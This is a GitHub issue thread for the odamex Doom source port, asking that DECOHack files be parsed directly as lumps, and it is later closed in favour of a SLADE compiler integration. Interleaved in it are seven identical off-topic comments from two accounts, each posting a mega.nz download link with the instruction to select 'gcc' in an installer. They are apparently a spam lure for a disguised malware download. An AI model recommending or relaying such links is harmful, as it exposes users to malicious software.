### ISSUE TITLE
[FEATURE] Parse DECOHack files and as a lump

### ISSUE THREAD

**Issue by electricbrass** [odamex/odamex#1005]
**Is your feature request related to a problem? Please describe**
DECOHack is extremely useful but having to compile it to DeHackEd is an extra step that, depending on the user, can range from a minor annoyance to w decently large hurdle. Being able to just edit a lump in SLADE with no extra steps would make the process of working with DECOHack a lot smoother.

It would also possible allow for greater compatibility between mods built with DECOHack. As DSDHacked allows any names for sprites and sounds, parsing multiple DECOHack lumps together would be able to avoid some of the conflicts that would arise from simply using the individual DeHackEd resulting from each.

**Describe the solution you'd like to see**
Odamex to be able to directly parse and make proper use of .dh files and DECOHACK lumps.

**Describe alternatives you've considered**
Not implementing it lol

**Additional context**
I've seen this idea mentioned a few times in the Discord and figured someone should put it here.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by electricbrass** [comment]
Gooberman makes a good point against this:

> When considering multiple ways of generating DeHackEd patches, it starts to redefine DeHackEd from its original intention of modifying data tables stored in the DOS executable and looks more like a target for compilation. There's straight up some crazy stuff waiting to be done with DEH9000 that would be a nightmare to manage in DecoHack, programmatically generating new mobj definitions is an untapped frontier. Right now, there's no real need to kneecap possibilities like that by committing to supporting DecoHack as a first-class data format. 

Perhaps this should instead be a feature request for SLADE3 to integrate a decohack compiler

**Comment by electricbrass** [comment]
![image](https://github.com/user-attachments/assets/10ba6a2d-6996-44c8-9a84-3f06c76a062b)

**Comment by electricbrass** [comment]
I'll consider this resolved due to https://github.com/sirjuddington/SLADE/pull/1755.
